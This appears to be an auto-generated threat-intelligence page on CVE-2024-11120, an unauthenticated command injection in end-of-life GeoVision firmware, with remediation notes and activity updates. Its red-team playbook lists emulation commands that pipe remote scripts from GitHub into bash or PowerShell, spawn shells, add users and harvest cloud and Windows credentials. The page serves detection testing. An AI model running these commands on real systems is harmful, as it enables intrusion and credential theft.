CVE-2024-11120
Overview
This vulnerability is an OS command injection affecting certain end-of-life GeoVision devices, including the GV-VS12 firmware. The root cause lies in insufficient input validation within the device's command processing component, allowing untrusted input to be passed directly to system shell commands. The affected component is the device firmware responsible for handling remote command inputs without proper sanitization, enabling execution of arbitrary system commands.
Vulnerability Description
Certain EOL GeoVision devices have an OS Command Injection vulnerability. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device. Moreover, this vulnerability has already been exploited by attackers, and we have received related reports.
Impact
An attacker can remotely execute arbitrary system commands on affected GeoVision devices without any authentication or user interaction. This enables full system compromise, including the ability to manipulate device configurations, access sensitive data, disrupt device operation, or pivot within the network. Given the critical severity and unauthenticated access, attackers can achieve complete control over the device, leading to potential data breaches, surveillance evasion, or denial of service.
Solution
GeoVision has published security advisories on their official CERT portal (https://www.twcert.org.tw) addressing this vulnerability. Users of GV-VS12 and related firmware versions should apply the latest firmware updates released by GeoVision as detailed in TW-CERT advisories cp-132-8236-d4836-1 and cp-139-8237-26d7a-2. These updates include patches to correct input validation flaws. Administrators are advised to consult these advisories for step-by-step patching instructions and to follow vendor guidance for secure device configuration.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in certain end-of-life GeoVision devices is characterized by an OS Command Injection flaw, which allows unauthenticated remote attackers to inject and execute arbitrary system commands on the affected devices. This type of vulnerability arises when an application improperly sanitizes user input, allowing malicious actors to manipulate command execution paths. In the case of these specific GeoVision firmware versions, the lack of adequate input validation creates a significant security gap. Attackers can exploit this flaw to gain unauthorized access to the underlying operating system, potentially leading to full control over the device.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker can initiate an attack remotely without needing any form of authentication, making it accessible to a wide range of threat actors. Exploitation may involve sending specially crafted requests to the device, which, if successful, could allow the attacker to execute commands that could alter device configurations, exfiltrate sensitive data, or even pivot to other devices on the network. Given that the vulnerability has already been actively exploited, it underscores the urgency for organizations using these devices to assess their exposure and implement necessary security measures.
The real-world impact of this vulnerability extends beyond the immediate compromise of the affected devices. Organizations relying on these GeoVision products may face significant business risks, including data breaches, loss of customer trust, and potential regulatory penalties. The ability for attackers to execute arbitrary commands could lead to the deployment of malware, data theft, or even the use of the device as a launch point for further attacks within the network. This not only jeopardizes the integrity of the organization's operations but also poses a threat to the privacy and security of end-users whose data may be processed or stored on these devices.
To effectively detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify exposed devices and assess their security posture. Implementing network segmentation can limit the potential impact of an exploit by isolating critical systems from less secure devices. Additionally, organizations should prioritize patch management, ensuring that all firmware is updated to the latest versions that address known vulnerabilities. In cases where devices are no longer supported or updated, organizations should consider decommissioning these systems and replacing them with more secure alternatives.
In conclusion, the OS Command Injection vulnerability in certain GeoVision devices poses a significant threat to organizations that utilize these products. The combination of unauthenticated access and the potential for arbitrary command execution creates a high-risk scenario that can lead to severe consequences. By understanding the technical details, potential attack vectors, and real-world implications, organizations can take proactive steps to detect and mitigate the risks associated with this vulnerability, thereby safeguarding their assets and maintaining the trust of their stakeholders.
CSURFACE threat intelligence has detected a notable surge in activity related to CVE-2024-11120, indicating increased exploitation attempts against vulnerable GeoVision GV-VS12 devices. While the overall exploit landscape remains unchanged with no new proof-of-concept exploits or ransomware affiliations identified, our telemetry reveals a clear upward trend in attacker engagement. This escalation underscores the persistent interest threat actors maintain in leveraging this unauthenticated OS command injection vulnerability to gain unauthorized control. The elevated detection frequency signals that adversaries may be intensifying reconnaissance or exploitation efforts, potentially increasing the likelihood of successful intrusions. Consequently, the risk profile for organizations operating affected devices has heightened, reinforcing the critical nature of this vulnerability and the urgency for vigilant monitoring. Although the EPSS score remains stable, the qualitative increase in exploitation attempts warrants an elevated threat posture, emphasizing that the vulnerability continues to be actively targeted in the wild.
Update 2 — August 03, 2026
CSURFACE threat intelligence has identified a discernible uptick in exploitation attempts targeting CVE-2024-11120, reflected by a moderate increase in telemetry alerts from our sensors. This trend suggests that adversaries are either intensifying reconnaissance efforts or refining their exploitation tactics against vulnerable GeoVision GV-VS12 devices. Although no new exploit variants or ransomware affiliations have been detected, the persistence and slight growth in activity underscore the vulnerability’s continued attractiveness as an attack vector. This development elevates the operational risk for organizations relying on affected devices, as the probability of successful compromise has incrementally increased. Consequently, defenders should recognize that the threat environment remains dynamic and that the vulnerability continues to be actively leveraged in the wild, warranting sustained vigilance despite stable EPSS scoring.
Update 3 — August 19, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the CVE-2024-11120 vulnerability in GeoVision GV-VS12 devices. Our telemetry indicates a significant uptick in detection activity, reflecting increased attacker interest and operational tempo. Although no novel exploit variants or ransomware affiliations have surfaced, the sustained rise in exploitation attempts underscores the vulnerability’s persistent appeal as an attack vector. This escalation heightens the risk profile for organizations utilizing affected devices, as it suggests adversaries are intensifying efforts to leverage this critical OS command injection flaw. The stable EPSS score, despite increased activity, indicates that while exploit techniques remain consistent, the volume and frequency of attacks are growing, thereby elevating the likelihood of successful compromise. Defenders should interpret this trend as a signal that the threat landscape is becoming more active and that reliance on existing mitigations must be continually reassessed to address the evolving exploitation dynamics.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Geovision | Gv-Vs12 Firmware | N/A |
cpe:2.3:o:geovision:gv-vs12_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Vs11 Firmware | N/A |
cpe:2.3:o:geovision:gv-vs11_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gv-Dsp Lpr Firmware | N/A |
cpe:2.3:o:geovision:gv-dsp_lpr_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gvlx 4 Firmware | N/A |
cpe:2.3:o:geovision:gvlx_4_firmware:-:*:*:*:*:*:*:*
|
|
|
Geovision | Gvlx 4 Firmware | N/A |
cpe:2.3:o:geovision:gvlx_4_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-11120 |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/tw/cp-132-8236-d4836-1.html |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/en/cp-139-8237-26d7a-2.html |
| akamai.com |
NVD API
Exploit
Third Party Advisory
|
https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-11120 |